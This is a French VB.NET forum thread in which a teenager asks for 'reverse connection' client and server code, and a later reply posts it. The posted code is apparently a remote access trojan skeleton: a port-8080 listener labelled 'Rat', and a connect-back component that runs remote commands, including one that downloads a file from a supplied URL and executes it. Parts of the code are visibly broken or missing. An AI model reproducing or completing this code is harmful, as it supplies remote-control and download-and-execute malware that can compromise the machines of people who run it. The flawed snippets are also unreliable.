Select case

leo2708 Messages postés 35 Date d'inscription lundi 8 mai 2006 Statut Membre Dernière intervention 22 août 2008 - 10 août 2007 à 10:25
montana54 Messages postés 2 Date d'inscription vendredi 18 janvier 2008 Statut Membre Dernière intervention 17 mars 2011 - 17 mars 2011 à 10:10
Bonjours a Tous .


Je me m'appelle leo j'ai 14 ans et je souhaite creer un logiciel pour mon usage personnelle c'est un logiciel qui utilise pas la simple connection mais la reverse ( Reseau) J'ai demandé a des copain ce qui falait faire il m'ont dit d'inversé mais j'ai pas trop compris et une autre question je n'arrive pas a utiliser les select case .


Exemple :


Select case ( Que faut t'il mettre la sachant que mon winsock se nomme winsock 1 )


case "1"


opencd


end select


end sub

Merci d'avoir li et repondu

Ps: Pouvez vous me donner tous le code du client et du serveur svp

Merci +++

22 réponses

montana54 Messages postés 2 Date d'inscription vendredi 18 janvier 2008 Statut Membre Dernière intervention 17 mars 2011
17 mars 2011 à 09:28
Je vais t'aider pour ta reverse connexion mon ami, j'ai très bien compris ton problème mais vois tu si tu ne boss pas un minimum les cours en .net tu ne feras que copier coller sans comprendre je ne vais donc pas tout détailler j ai autre chose a faire...
en faite pour la reverse connexion c'est simple,

Le client:

Imports System.IO, System.Net, System.Net.Sockets ' ici les "imports" vois ce qu 'est un imports dans tes cours.
Public Class Main 'ici la feuille de lancement de ton programme revois tes cours si tu comprends rien
Dim Listener As TcpListener 'des cours ici aussi existes sur l'utilisation du Tcp client
Dim Client As TcpClient
Dim ClientList As New List(Of ChatClient)
Dim sReader As StreamReader
Dim cClient As ChatClient 'ici une fonction de mon programme que je déclare si tu comprends rien vois les cours sur les variables...

ici c'est la configue du client en mode "écoute" (pour ta reverse connexion) donc de manière logique le server sera a configurer en fonction de
Private Sub FrmMain_FormClosing(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing
cClient.Send("BYE")
Invalidate()
Listener.Stop()
End
End Sub
Sub xLoad() Handles Me.Load
Listener = New TcpListener(IPAddress.Any, 8080)
Listener.Start()
Listener.BeginAcceptTcpClient(New AsyncCallback(AddressOf AcceptClient), Listener)
End Sub
Sub AcceptClient(ByVal ar As IAsyncResult)
cClient = New ChatClient(Listener.EndAcceptTcpClient(ar))
AddHandler (cClient.MessageRecieved), AddressOf MessageRecieved
AddHandler (cClient.ClientExited), AddressOf ClientExited
ClientList.Add(cClient)
cClient.Send("MBOX|Welcome! All credits to Nathan72389!|Rat")
Listener.BeginAcceptTcpClient(New AsyncCallback(AddressOf AcceptClient), Listener)
End Sub

le server:
attention ici il manque pleins de chose du genre constant, variable form etc... mais pour la théorie voila une partie du code en espérant t avoir aiguillé, tu auras sans aucun doute besoin de suivre des cours réfléchis pas trop tu perds du temps go suivre les cours du site ils sont très bien fait vive VbFrance!!
Imports System.IO, System.Net, System.Net.Sockets
Sub Connexion()
While IsConnected = False
Client = New TcpClient("127.0.0.1", 8080)
Client.GetStream.BeginRead(New Byte() {0}, 0, 0, New AsyncCallback(AddressOf Read), Nothing)
Send(Nick)
System.Threading.Thread.Sleep(9001)
End While
End Sub
Sub Read(ByVal ar As IAsyncResult)
Try
Dim responce As String = New StreamReader(Client.GetStream).ReadLine
If responce.Contains("MBOX") Then
Dim Arr() As String = Split(responce, "|")
MsgBox(Arr(1), , Arr(2))
End If
If responce <> "" Then
IsConnected = True
End If
If responce = "BYE" Then
IsConnected = False
Client.Close()
End If
If responce = "DIE" Then
End
End If
If responce.Contains("DL") Then
Dim P As New Random
Dim Q As Integer = P.Next(11111, 99999)
Dim Arr() As String = Split(responce, "|")
Dim WC As New WebClient
Dim FName As String = Arr(1).LastIndexOf("/"c)
WC.DownloadFileAsync(New Uri(Arr(1)), CurDir() & "" & FName)
Shell(CurDir() & Q & ".exe")
End If
Client.GetStream.BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
Catch ex As Exception
Connexion()
Exit Sub
End Try
End Sub

au faite c'est mon 1er poste bonjour a tous!
0
montana54 Messages postés 2 Date d'inscription vendredi 18 janvier 2008 Statut Membre Dernière intervention 17 mars 2011
17 mars 2011 à 10:10
lol J avais pas vu la date... désolé je suis pas réveillé...
J aurais bien supprimé mon poste mais je n arrive pas a le rééditer.
0
Rejoignez-nous